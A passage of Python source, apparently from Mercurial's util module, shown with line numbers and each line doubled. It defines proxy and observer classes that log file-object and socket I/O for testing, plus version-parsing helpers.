487 __bool__ = __nonzero__
487 __bool__ = __nonzero__
488
488
489 def __delattr__(self, name):
489 def __delattr__(self, name):
490 return delattr(object.__getattribute__(self, '_orig'), name)
490 return delattr(object.__getattribute__(self, '_orig'), name)
491
491
492 def __setattr__(self, name, value):
492 def __setattr__(self, name, value):
493 return setattr(object.__getattribute__(self, '_orig'), name, value)
493 return setattr(object.__getattribute__(self, '_orig'), name, value)
494
494
495 def __iter__(self):
495 def __iter__(self):
496 return object.__getattribute__(self, '_orig').__iter__()
496 return object.__getattribute__(self, '_orig').__iter__()
497
497
498 def _observedcall(self, name, *args, **kwargs):
498 def _observedcall(self, name, *args, **kwargs):
499 # Call the original object.
499 # Call the original object.
500 orig = object.__getattribute__(self, '_orig')
500 orig = object.__getattribute__(self, '_orig')
501 res = getattr(orig, name)(*args, **kwargs)
501 res = getattr(orig, name)(*args, **kwargs)
502
502
503 # Call a method on the observer of the same name with arguments
503 # Call a method on the observer of the same name with arguments
504 # so it can react, log, etc.
504 # so it can react, log, etc.
505 observer = object.__getattribute__(self, '_observer')
505 observer = object.__getattribute__(self, '_observer')
506 fn = getattr(observer, name, None)
506 fn = getattr(observer, name, None)
507 if fn:
507 if fn:
508 fn(res, *args, **kwargs)
508 fn(res, *args, **kwargs)
509
509
510 return res
510 return res
511
511
512 def close(self, *args, **kwargs):
512 def close(self, *args, **kwargs):
513 return object.__getattribute__(self, '_observedcall')(
513 return object.__getattribute__(self, '_observedcall')(
514 'close', *args, **kwargs
514 'close', *args, **kwargs
515 )
515 )
516
516
517 def fileno(self, *args, **kwargs):
517 def fileno(self, *args, **kwargs):
518 return object.__getattribute__(self, '_observedcall')(
518 return object.__getattribute__(self, '_observedcall')(
519 'fileno', *args, **kwargs
519 'fileno', *args, **kwargs
520 )
520 )
521
521
522 def flush(self, *args, **kwargs):
522 def flush(self, *args, **kwargs):
523 return object.__getattribute__(self, '_observedcall')(
523 return object.__getattribute__(self, '_observedcall')(
524 'flush', *args, **kwargs
524 'flush', *args, **kwargs
525 )
525 )
526
526
527 def isatty(self, *args, **kwargs):
527 def isatty(self, *args, **kwargs):
528 return object.__getattribute__(self, '_observedcall')(
528 return object.__getattribute__(self, '_observedcall')(
529 'isatty', *args, **kwargs
529 'isatty', *args, **kwargs
530 )
530 )
531
531
532 def readable(self, *args, **kwargs):
532 def readable(self, *args, **kwargs):
533 return object.__getattribute__(self, '_observedcall')(
533 return object.__getattribute__(self, '_observedcall')(
534 'readable', *args, **kwargs
534 'readable', *args, **kwargs
535 )
535 )
536
536
537 def readline(self, *args, **kwargs):
537 def readline(self, *args, **kwargs):
538 return object.__getattribute__(self, '_observedcall')(
538 return object.__getattribute__(self, '_observedcall')(
539 'readline', *args, **kwargs
539 'readline', *args, **kwargs
540 )
540 )
541
541
542 def readlines(self, *args, **kwargs):
542 def readlines(self, *args, **kwargs):
543 return object.__getattribute__(self, '_observedcall')(
543 return object.__getattribute__(self, '_observedcall')(
544 'readlines', *args, **kwargs
544 'readlines', *args, **kwargs
545 )
545 )
546
546
547 def seek(self, *args, **kwargs):
547 def seek(self, *args, **kwargs):
548 return object.__getattribute__(self, '_observedcall')(
548 return object.__getattribute__(self, '_observedcall')(
549 'seek', *args, **kwargs
549 'seek', *args, **kwargs
550 )
550 )
551
551
552 def seekable(self, *args, **kwargs):
552 def seekable(self, *args, **kwargs):
553 return object.__getattribute__(self, '_observedcall')(
553 return object.__getattribute__(self, '_observedcall')(
554 'seekable', *args, **kwargs
554 'seekable', *args, **kwargs
555 )
555 )
556
556
557 def tell(self, *args, **kwargs):
557 def tell(self, *args, **kwargs):
558 return object.__getattribute__(self, '_observedcall')(
558 return object.__getattribute__(self, '_observedcall')(
559 'tell', *args, **kwargs
559 'tell', *args, **kwargs
560 )
560 )
561
561
562 def truncate(self, *args, **kwargs):
562 def truncate(self, *args, **kwargs):
563 return object.__getattribute__(self, '_observedcall')(
563 return object.__getattribute__(self, '_observedcall')(
564 'truncate', *args, **kwargs
564 'truncate', *args, **kwargs
565 )
565 )
566
566
567 def writable(self, *args, **kwargs):
567 def writable(self, *args, **kwargs):
568 return object.__getattribute__(self, '_observedcall')(
568 return object.__getattribute__(self, '_observedcall')(
569 'writable', *args, **kwargs
569 'writable', *args, **kwargs
570 )
570 )
571
571
572 def writelines(self, *args, **kwargs):
572 def writelines(self, *args, **kwargs):
573 return object.__getattribute__(self, '_observedcall')(
573 return object.__getattribute__(self, '_observedcall')(
574 'writelines', *args, **kwargs
574 'writelines', *args, **kwargs
575 )
575 )
576
576
577 def read(self, *args, **kwargs):
577 def read(self, *args, **kwargs):
578 return object.__getattribute__(self, '_observedcall')(
578 return object.__getattribute__(self, '_observedcall')(
579 'read', *args, **kwargs
579 'read', *args, **kwargs
580 )
580 )
581
581
582 def readall(self, *args, **kwargs):
582 def readall(self, *args, **kwargs):
583 return object.__getattribute__(self, '_observedcall')(
583 return object.__getattribute__(self, '_observedcall')(
584 'readall', *args, **kwargs
584 'readall', *args, **kwargs
585 )
585 )
586
586
587 def readinto(self, *args, **kwargs):
587 def readinto(self, *args, **kwargs):
588 return object.__getattribute__(self, '_observedcall')(
588 return object.__getattribute__(self, '_observedcall')(
589 'readinto', *args, **kwargs
589 'readinto', *args, **kwargs
590 )
590 )
591
591
592 def write(self, *args, **kwargs):
592 def write(self, *args, **kwargs):
593 return object.__getattribute__(self, '_observedcall')(
593 return object.__getattribute__(self, '_observedcall')(
594 'write', *args, **kwargs
594 'write', *args, **kwargs
595 )
595 )
596
596
597 def detach(self, *args, **kwargs):
597 def detach(self, *args, **kwargs):
598 return object.__getattribute__(self, '_observedcall')(
598 return object.__getattribute__(self, '_observedcall')(
599 'detach', *args, **kwargs
599 'detach', *args, **kwargs
600 )
600 )
601
601
602 def read1(self, *args, **kwargs):
602 def read1(self, *args, **kwargs):
603 return object.__getattribute__(self, '_observedcall')(
603 return object.__getattribute__(self, '_observedcall')(
604 'read1', *args, **kwargs
604 'read1', *args, **kwargs
605 )
605 )
606
606
607
607
608 class observedbufferedinputpipe(bufferedinputpipe):
608 class observedbufferedinputpipe(bufferedinputpipe):
609 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
609 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
610
610
611 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
611 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
612 bypass ``fileobjectproxy``. Because of this, we need to make
612 bypass ``fileobjectproxy``. Because of this, we need to make
613 ``bufferedinputpipe`` aware of these operations.
613 ``bufferedinputpipe`` aware of these operations.
614
614
615 This variation of ``bufferedinputpipe`` can notify observers about
615 This variation of ``bufferedinputpipe`` can notify observers about
616 ``os.read()`` events. It also re-publishes other events, such as
616 ``os.read()`` events. It also re-publishes other events, such as
617 ``read()`` and ``readline()``.
617 ``read()`` and ``readline()``.
618 """
618 """
619
619
620 def _fillbuffer(self):
620 def _fillbuffer(self):
621 res = super(observedbufferedinputpipe, self)._fillbuffer()
621 res = super(observedbufferedinputpipe, self)._fillbuffer()
622
622
623 fn = getattr(self._input._observer, 'osread', None)
623 fn = getattr(self._input._observer, 'osread', None)
624 if fn:
624 if fn:
625 fn(res, _chunksize)
625 fn(res, _chunksize)
626
626
627 return res
627 return res
628
628
629 # We use different observer methods because the operation isn't
629 # We use different observer methods because the operation isn't
630 # performed on the actual file object but on us.
630 # performed on the actual file object but on us.
631 def read(self, size):
631 def read(self, size):
632 res = super(observedbufferedinputpipe, self).read(size)
632 res = super(observedbufferedinputpipe, self).read(size)
633
633
634 fn = getattr(self._input._observer, 'bufferedread', None)
634 fn = getattr(self._input._observer, 'bufferedread', None)
635 if fn:
635 if fn:
636 fn(res, size)
636 fn(res, size)
637
637
638 return res
638 return res
639
639
640 def readline(self, *args, **kwargs):
640 def readline(self, *args, **kwargs):
641 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
641 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
642
642
643 fn = getattr(self._input._observer, 'bufferedreadline', None)
643 fn = getattr(self._input._observer, 'bufferedreadline', None)
644 if fn:
644 if fn:
645 fn(res)
645 fn(res)
646
646
647 return res
647 return res
648
648
649
649
650 PROXIED_SOCKET_METHODS = {
650 PROXIED_SOCKET_METHODS = {
651 'makefile',
651 'makefile',
652 'recv',
652 'recv',
653 'recvfrom',
653 'recvfrom',
654 'recvfrom_into',
654 'recvfrom_into',
655 'recv_into',
655 'recv_into',
656 'send',
656 'send',
657 'sendall',
657 'sendall',
658 'sendto',
658 'sendto',
659 'setblocking',
659 'setblocking',
660 'settimeout',
660 'settimeout',
661 'gettimeout',
661 'gettimeout',
662 'setsockopt',
662 'setsockopt',
663 }
663 }
664
664
665
665
666 class socketproxy(object):
666 class socketproxy(object):
667 """A proxy around a socket that tells a watcher when events occur.
667 """A proxy around a socket that tells a watcher when events occur.
668
668
669 This is like ``fileobjectproxy`` except for sockets.
669 This is like ``fileobjectproxy`` except for sockets.
670
670
671 This type is intended to only be used for testing purposes. Think hard
671 This type is intended to only be used for testing purposes. Think hard
672 before using it in important code.
672 before using it in important code.
673 """
673 """
674
674
675 __slots__ = (
675 __slots__ = (
676 '_orig',
676 '_orig',
677 '_observer',
677 '_observer',
678 )
678 )
679
679
680 def __init__(self, sock, observer):
680 def __init__(self, sock, observer):
681 object.__setattr__(self, '_orig', sock)
681 object.__setattr__(self, '_orig', sock)
682 object.__setattr__(self, '_observer', observer)
682 object.__setattr__(self, '_observer', observer)
683
683
684 def __getattribute__(self, name):
684 def __getattribute__(self, name):
685 if name in PROXIED_SOCKET_METHODS:
685 if name in PROXIED_SOCKET_METHODS:
686 return object.__getattribute__(self, name)
686 return object.__getattribute__(self, name)
687
687
688 return getattr(object.__getattribute__(self, '_orig'), name)
688 return getattr(object.__getattribute__(self, '_orig'), name)
689
689
690 def __delattr__(self, name):
690 def __delattr__(self, name):
691 return delattr(object.__getattribute__(self, '_orig'), name)
691 return delattr(object.__getattribute__(self, '_orig'), name)
692
692
693 def __setattr__(self, name, value):
693 def __setattr__(self, name, value):
694 return setattr(object.__getattribute__(self, '_orig'), name, value)
694 return setattr(object.__getattribute__(self, '_orig'), name, value)
695
695
696 def __nonzero__(self):
696 def __nonzero__(self):
697 return bool(object.__getattribute__(self, '_orig'))
697 return bool(object.__getattribute__(self, '_orig'))
698
698
699 __bool__ = __nonzero__
699 __bool__ = __nonzero__
700
700
701 def _observedcall(self, name, *args, **kwargs):
701 def _observedcall(self, name, *args, **kwargs):
702 # Call the original object.
702 # Call the original object.
703 orig = object.__getattribute__(self, '_orig')
703 orig = object.__getattribute__(self, '_orig')
704 res = getattr(orig, name)(*args, **kwargs)
704 res = getattr(orig, name)(*args, **kwargs)
705
705
706 # Call a method on the observer of the same name with arguments
706 # Call a method on the observer of the same name with arguments
707 # so it can react, log, etc.
707 # so it can react, log, etc.
708 observer = object.__getattribute__(self, '_observer')
708 observer = object.__getattribute__(self, '_observer')
709 fn = getattr(observer, name, None)
709 fn = getattr(observer, name, None)
710 if fn:
710 if fn:
711 fn(res, *args, **kwargs)
711 fn(res, *args, **kwargs)
712
712
713 return res
713 return res
714
714
715 def makefile(self, *args, **kwargs):
715 def makefile(self, *args, **kwargs):
716 res = object.__getattribute__(self, '_observedcall')(
716 res = object.__getattribute__(self, '_observedcall')(
717 'makefile', *args, **kwargs
717 'makefile', *args, **kwargs
718 )
718 )
719
719
720 # The file object may be used for I/O. So we turn it into a
720 # The file object may be used for I/O. So we turn it into a
721 # proxy using our observer.
721 # proxy using our observer.
722 observer = object.__getattribute__(self, '_observer')
722 observer = object.__getattribute__(self, '_observer')
723 return makeloggingfileobject(
723 return makeloggingfileobject(
724 observer.fh,
724 observer.fh,
725 res,
725 res,
726 observer.name,
726 observer.name,
727 reads=observer.reads,
727 reads=observer.reads,
728 writes=observer.writes,
728 writes=observer.writes,
729 logdata=observer.logdata,
729 logdata=observer.logdata,
730 logdataapis=observer.logdataapis,
730 logdataapis=observer.logdataapis,
731 )
731 )
732
732
733 def recv(self, *args, **kwargs):
733 def recv(self, *args, **kwargs):
734 return object.__getattribute__(self, '_observedcall')(
734 return object.__getattribute__(self, '_observedcall')(
735 'recv', *args, **kwargs
735 'recv', *args, **kwargs
736 )
736 )
737
737
738 def recvfrom(self, *args, **kwargs):
738 def recvfrom(self, *args, **kwargs):
739 return object.__getattribute__(self, '_observedcall')(
739 return object.__getattribute__(self, '_observedcall')(
740 'recvfrom', *args, **kwargs
740 'recvfrom', *args, **kwargs
741 )
741 )
742
742
743 def recvfrom_into(self, *args, **kwargs):
743 def recvfrom_into(self, *args, **kwargs):
744 return object.__getattribute__(self, '_observedcall')(
744 return object.__getattribute__(self, '_observedcall')(
745 'recvfrom_into', *args, **kwargs
745 'recvfrom_into', *args, **kwargs
746 )
746 )
747
747
748 def recv_into(self, *args, **kwargs):
748 def recv_into(self, *args, **kwargs):
749 return object.__getattribute__(self, '_observedcall')(
749 return object.__getattribute__(self, '_observedcall')(
750 'recv_info', *args, **kwargs
750 'recv_info', *args, **kwargs
751 )
751 )
752
752
753 def send(self, *args, **kwargs):
753 def send(self, *args, **kwargs):
754 return object.__getattribute__(self, '_observedcall')(
754 return object.__getattribute__(self, '_observedcall')(
755 'send', *args, **kwargs
755 'send', *args, **kwargs
756 )
756 )
757
757
758 def sendall(self, *args, **kwargs):
758 def sendall(self, *args, **kwargs):
759 return object.__getattribute__(self, '_observedcall')(
759 return object.__getattribute__(self, '_observedcall')(
760 'sendall', *args, **kwargs
760 'sendall', *args, **kwargs
761 )
761 )
762
762
763 def sendto(self, *args, **kwargs):
763 def sendto(self, *args, **kwargs):
764 return object.__getattribute__(self, '_observedcall')(
764 return object.__getattribute__(self, '_observedcall')(
765 'sendto', *args, **kwargs
765 'sendto', *args, **kwargs
766 )
766 )
767
767
768 def setblocking(self, *args, **kwargs):
768 def setblocking(self, *args, **kwargs):
769 return object.__getattribute__(self, '_observedcall')(
769 return object.__getattribute__(self, '_observedcall')(
770 'setblocking', *args, **kwargs
770 'setblocking', *args, **kwargs
771 )
771 )
772
772
773 def settimeout(self, *args, **kwargs):
773 def settimeout(self, *args, **kwargs):
774 return object.__getattribute__(self, '_observedcall')(
774 return object.__getattribute__(self, '_observedcall')(
775 'settimeout', *args, **kwargs
775 'settimeout', *args, **kwargs
776 )
776 )
777
777
778 def gettimeout(self, *args, **kwargs):
778 def gettimeout(self, *args, **kwargs):
779 return object.__getattribute__(self, '_observedcall')(
779 return object.__getattribute__(self, '_observedcall')(
780 'gettimeout', *args, **kwargs
780 'gettimeout', *args, **kwargs
781 )
781 )
782
782
783 def setsockopt(self, *args, **kwargs):
783 def setsockopt(self, *args, **kwargs):
784 return object.__getattribute__(self, '_observedcall')(
784 return object.__getattribute__(self, '_observedcall')(
785 'setsockopt', *args, **kwargs
785 'setsockopt', *args, **kwargs
786 )
786 )
787
787
788
788
789 class baseproxyobserver(object):
789 class baseproxyobserver(object):
790 def __init__(self, fh, name, logdata, logdataapis):
790 def __init__(self, fh, name, logdata, logdataapis):
791 self.fh = fh
791 self.fh = fh
792 self.name = name
792 self.name = name
793 self.logdata = logdata
793 self.logdata = logdata
794 self.logdataapis = logdataapis
794 self.logdataapis = logdataapis
795
795
796 def _writedata(self, data):
796 def _writedata(self, data):
797 if not self.logdata:
797 if not self.logdata:
798 if self.logdataapis:
798 if self.logdataapis:
799 self.fh.write(b'\n')
799 self.fh.write(b'\n')
800 self.fh.flush()
800 self.fh.flush()
801 return
801 return
802
802
803 # Simple case writes all data on a single line.
803 # Simple case writes all data on a single line.
804 if b'\n' not in data:
804 if b'\n' not in data:
805 if self.logdataapis:
805 if self.logdataapis:
806 self.fh.write(b': %s\n' % stringutil.escapestr(data))
806 self.fh.write(b': %s\n' % stringutil.escapestr(data))
807 else:
807 else:
808 self.fh.write(
808 self.fh.write(
809 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
809 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
810 )
810 )
811 self.fh.flush()
811 self.fh.flush()
812 return
812 return
813
813
814 # Data with newlines is written to multiple lines.
814 # Data with newlines is written to multiple lines.
815 if self.logdataapis:
815 if self.logdataapis:
816 self.fh.write(b':\n')
816 self.fh.write(b':\n')
817
817
818 lines = data.splitlines(True)
818 lines = data.splitlines(True)
819 for line in lines:
819 for line in lines:
820 self.fh.write(
820 self.fh.write(
821 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
821 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
822 )
822 )
823 self.fh.flush()
823 self.fh.flush()
824
824
825
825
826 class fileobjectobserver(baseproxyobserver):
826 class fileobjectobserver(baseproxyobserver):
827 """Logs file object activity."""
827 """Logs file object activity."""
828
828
829 def __init__(
829 def __init__(
830 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
830 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
831 ):
831 ):
832 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
832 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
833 self.reads = reads
833 self.reads = reads
834 self.writes = writes
834 self.writes = writes
835
835
836 def read(self, res, size=-1):
836 def read(self, res, size=-1):
837 if not self.reads:
837 if not self.reads:
838 return
838 return
839 # Python 3 can return None from reads at EOF instead of empty strings.
839 # Python 3 can return None from reads at EOF instead of empty strings.
840 if res is None:
840 if res is None:
841 res = b''
841 res = b''
842
842
843 if size == -1 and res == b'':
843 if size == -1 and res == b'':
844 # Suppress pointless read(-1) calls that return
844 # Suppress pointless read(-1) calls that return
845 # nothing. These happen _a lot_ on Python 3, and there
845 # nothing. These happen _a lot_ on Python 3, and there
846 # doesn't seem to be a better workaround to have matching
846 # doesn't seem to be a better workaround to have matching
847 # Python 2 and 3 behavior. :(
847 # Python 2 and 3 behavior. :(
848 return
848 return
849
849
850 if self.logdataapis:
850 if self.logdataapis:
851 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
851 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
852
852
853 self._writedata(res)
853 self._writedata(res)
854
854
855 def readline(self, res, limit=-1):
855 def readline(self, res, limit=-1):
856 if not self.reads:
856 if not self.reads:
857 return
857 return
858
858
859 if self.logdataapis:
859 if self.logdataapis:
860 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
860 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
861
861
862 self._writedata(res)
862 self._writedata(res)
863
863
864 def readinto(self, res, dest):
864 def readinto(self, res, dest):
865 if not self.reads:
865 if not self.reads:
866 return
866 return
867
867
868 if self.logdataapis:
868 if self.logdataapis:
869 self.fh.write(
869 self.fh.write(
870 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
870 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
871 )
871 )
872
872
873 data = dest[0:res] if res is not None else b''
873 data = dest[0:res] if res is not None else b''
874
874
875 # _writedata() uses "in" operator and is confused by memoryview because
875 # _writedata() uses "in" operator and is confused by memoryview because
876 # characters are ints on Python 3.
876 # characters are ints on Python 3.
877 if isinstance(data, memoryview):
877 if isinstance(data, memoryview):
878 data = data.tobytes()
878 data = data.tobytes()
879
879
880 self._writedata(data)
880 self._writedata(data)
881
881
882 def write(self, res, data):
882 def write(self, res, data):
883 if not self.writes:
883 if not self.writes:
884 return
884 return
885
885
886 # Python 2 returns None from some write() calls. Python 3 (reasonably)
886 # Python 2 returns None from some write() calls. Python 3 (reasonably)
887 # returns the integer bytes written.
887 # returns the integer bytes written.
888 if res is None and data:
888 if res is None and data:
889 res = len(data)
889 res = len(data)
890
890
891 if self.logdataapis:
891 if self.logdataapis:
892 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
892 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
893
893
894 self._writedata(data)
894 self._writedata(data)
895
895
896 def flush(self, res):
896 def flush(self, res):
897 if not self.writes:
897 if not self.writes:
898 return
898 return
899
899
900 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
900 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
901
901
902 # For observedbufferedinputpipe.
902 # For observedbufferedinputpipe.
903 def bufferedread(self, res, size):
903 def bufferedread(self, res, size):
904 if not self.reads:
904 if not self.reads:
905 return
905 return
906
906
907 if self.logdataapis:
907 if self.logdataapis:
908 self.fh.write(
908 self.fh.write(
909 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
909 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
910 )
910 )
911
911
912 self._writedata(res)
912 self._writedata(res)
913
913
914 def bufferedreadline(self, res):
914 def bufferedreadline(self, res):
915 if not self.reads:
915 if not self.reads:
916 return
916 return
917
917
918 if self.logdataapis:
918 if self.logdataapis:
919 self.fh.write(
919 self.fh.write(
920 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
920 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
921 )
921 )
922
922
923 self._writedata(res)
923 self._writedata(res)
924
924
925
925
926 def makeloggingfileobject(
926 def makeloggingfileobject(
927 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
927 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
928 ):
928 ):
929 """Turn a file object into a logging file object."""
929 """Turn a file object into a logging file object."""
930
930
931 observer = fileobjectobserver(
931 observer = fileobjectobserver(
932 logh,
932 logh,
933 name,
933 name,
934 reads=reads,
934 reads=reads,
935 writes=writes,
935 writes=writes,
936 logdata=logdata,
936 logdata=logdata,
937 logdataapis=logdataapis,
937 logdataapis=logdataapis,
938 )
938 )
939 return fileobjectproxy(fh, observer)
939 return fileobjectproxy(fh, observer)
940
940
941
941
942 class socketobserver(baseproxyobserver):
942 class socketobserver(baseproxyobserver):
943 """Logs socket activity."""
943 """Logs socket activity."""
944
944
945 def __init__(
945 def __init__(
946 self,
946 self,
947 fh,
947 fh,
948 name,
948 name,
949 reads=True,
949 reads=True,
950 writes=True,
950 writes=True,
951 states=True,
951 states=True,
952 logdata=False,
952 logdata=False,
953 logdataapis=True,
953 logdataapis=True,
954 ):
954 ):
955 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
955 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
956 self.reads = reads
956 self.reads = reads
957 self.writes = writes
957 self.writes = writes
958 self.states = states
958 self.states = states
959
959
960 def makefile(self, res, mode=None, bufsize=None):
960 def makefile(self, res, mode=None, bufsize=None):
961 if not self.states:
961 if not self.states:
962 return
962 return
963
963
964 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
964 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
965
965
966 def recv(self, res, size, flags=0):
966 def recv(self, res, size, flags=0):
967 if not self.reads:
967 if not self.reads:
968 return
968 return
969
969
970 if self.logdataapis:
970 if self.logdataapis:
971 self.fh.write(
971 self.fh.write(
972 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
972 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
973 )
973 )
974 self._writedata(res)
974 self._writedata(res)
975
975
976 def recvfrom(self, res, size, flags=0):
976 def recvfrom(self, res, size, flags=0):
977 if not self.reads:
977 if not self.reads:
978 return
978 return
979
979
980 if self.logdataapis:
980 if self.logdataapis:
981 self.fh.write(
981 self.fh.write(
982 b'%s> recvfrom(%d, %d) -> %d'
982 b'%s> recvfrom(%d, %d) -> %d'
983 % (self.name, size, flags, len(res[0]))
983 % (self.name, size, flags, len(res[0]))
984 )
984 )
985
985
986 self._writedata(res[0])
986 self._writedata(res[0])
987
987
988 def recvfrom_into(self, res, buf, size, flags=0):
988 def recvfrom_into(self, res, buf, size, flags=0):
989 if not self.reads:
989 if not self.reads:
990 return
990 return
991
991
992 if self.logdataapis:
992 if self.logdataapis:
993 self.fh.write(
993 self.fh.write(
994 b'%s> recvfrom_into(%d, %d) -> %d'
994 b'%s> recvfrom_into(%d, %d) -> %d'
995 % (self.name, size, flags, res[0])
995 % (self.name, size, flags, res[0])
996 )
996 )
997
997
998 self._writedata(buf[0 : res[0]])
998 self._writedata(buf[0 : res[0]])
999
999
1000 def recv_into(self, res, buf, size=0, flags=0):
1000 def recv_into(self, res, buf, size=0, flags=0):
1001 if not self.reads:
1001 if not self.reads:
1002 return
1002 return
1003
1003
1004 if self.logdataapis:
1004 if self.logdataapis:
1005 self.fh.write(
1005 self.fh.write(
1006 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1006 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1007 )
1007 )
1008
1008
1009 self._writedata(buf[0:res])
1009 self._writedata(buf[0:res])
1010
1010
1011 def send(self, res, data, flags=0):
1011 def send(self, res, data, flags=0):
1012 if not self.writes:
1012 if not self.writes:
1013 return
1013 return
1014
1014
1015 self.fh.write(
1015 self.fh.write(
1016 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1016 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1017 )
1017 )
1018 self._writedata(data)
1018 self._writedata(data)
1019
1019
1020 def sendall(self, res, data, flags=0):
1020 def sendall(self, res, data, flags=0):
1021 if not self.writes:
1021 if not self.writes:
1022 return
1022 return
1023
1023
1024 if self.logdataapis:
1024 if self.logdataapis:
1025 # Returns None on success. So don't bother reporting return value.
1025 # Returns None on success. So don't bother reporting return value.
1026 self.fh.write(
1026 self.fh.write(
1027 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1027 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1028 )
1028 )
1029
1029
1030 self._writedata(data)
1030 self._writedata(data)
1031
1031
1032 def sendto(self, res, data, flagsoraddress, address=None):
1032 def sendto(self, res, data, flagsoraddress, address=None):
1033 if not self.writes:
1033 if not self.writes:
1034 return
1034 return
1035
1035
1036 if address:
1036 if address:
1037 flags = flagsoraddress
1037 flags = flagsoraddress
1038 else:
1038 else:
1039 flags = 0
1039 flags = 0
1040
1040
1041 if self.logdataapis:
1041 if self.logdataapis:
1042 self.fh.write(
1042 self.fh.write(
1043 b'%s> sendto(%d, %d, %r) -> %d'
1043 b'%s> sendto(%d, %d, %r) -> %d'
1044 % (self.name, len(data), flags, address, res)
1044 % (self.name, len(data), flags, address, res)
1045 )
1045 )
1046
1046
1047 self._writedata(data)
1047 self._writedata(data)
1048
1048
1049 def setblocking(self, res, flag):
1049 def setblocking(self, res, flag):
1050 if not self.states:
1050 if not self.states:
1051 return
1051 return
1052
1052
1053 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1053 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1054
1054
1055 def settimeout(self, res, value):
1055 def settimeout(self, res, value):
1056 if not self.states:
1056 if not self.states:
1057 return
1057 return
1058
1058
1059 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1059 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1060
1060
1061 def gettimeout(self, res):
1061 def gettimeout(self, res):
1062 if not self.states:
1062 if not self.states:
1063 return
1063 return
1064
1064
1065 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1065 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1066
1066
1067 def setsockopt(self, res, level, optname, value):
1067 def setsockopt(self, res, level, optname, value):
1068 if not self.states:
1068 if not self.states:
1069 return
1069 return
1070
1070
1071 self.fh.write(
1071 self.fh.write(
1072 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1072 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1073 % (self.name, level, optname, value, res)
1073 % (self.name, level, optname, value, res)
1074 )
1074 )
1075
1075
1076
1076
1077 def makeloggingsocket(
1077 def makeloggingsocket(
1078 logh,
1078 logh,
1079 fh,
1079 fh,
1080 name,
1080 name,
1081 reads=True,
1081 reads=True,
1082 writes=True,
1082 writes=True,
1083 states=True,
1083 states=True,
1084 logdata=False,
1084 logdata=False,
1085 logdataapis=True,
1085 logdataapis=True,
1086 ):
1086 ):
1087 """Turn a socket into a logging socket."""
1087 """Turn a socket into a logging socket."""
1088
1088
1089 observer = socketobserver(
1089 observer = socketobserver(
1090 logh,
1090 logh,
1091 name,
1091 name,
1092 reads=reads,
1092 reads=reads,
1093 writes=writes,
1093 writes=writes,
1094 states=states,
1094 states=states,
1095 logdata=logdata,
1095 logdata=logdata,
1096 logdataapis=logdataapis,
1096 logdataapis=logdataapis,
1097 )
1097 )
1098 return socketproxy(fh, observer)
1098 return socketproxy(fh, observer)
1099
1099
1100
1100
1101 def version():
1101 def version():
1102 """Return version information if available."""
1102 """Return version information if available."""
1103 try:
1103 try:
1104 from . import __version__
1104 from . import __version__
1105
1105
1106 return __version__.version
1106 return __version__.version
1107 except ImportError:
1107 except ImportError:
1108 return b'unknown'
1108 return b'unknown'
1109
1109
1110
1110
1111 def versiontuple(v=None, n=4):
1111 def versiontuple(v=None, n=4):
1112 """Parses a Mercurial version string into an N-tuple.
1112 """Parses a Mercurial version string into an N-tuple.
1113
1113
1114 The version string to be parsed is specified with the ``v`` argument.
1114 The version string to be parsed is specified with the ``v`` argument.
1115 If it isn't defined, the current Mercurial version string will be parsed.
1115 If it isn't defined, the current Mercurial version string will be parsed.
1116
1116
1117 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1117 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1118 returned values:
1118 returned values:
1119
1119
1120 >>> v = b'3.6.1+190-df9b73d2d444'
1120 >>> v = b'3.6.1+190-df9b73d2d444'
1121 >>> versiontuple(v, 2)
1121 >>> versiontuple(v, 2)
1122 (3, 6)
1122 (3, 6)
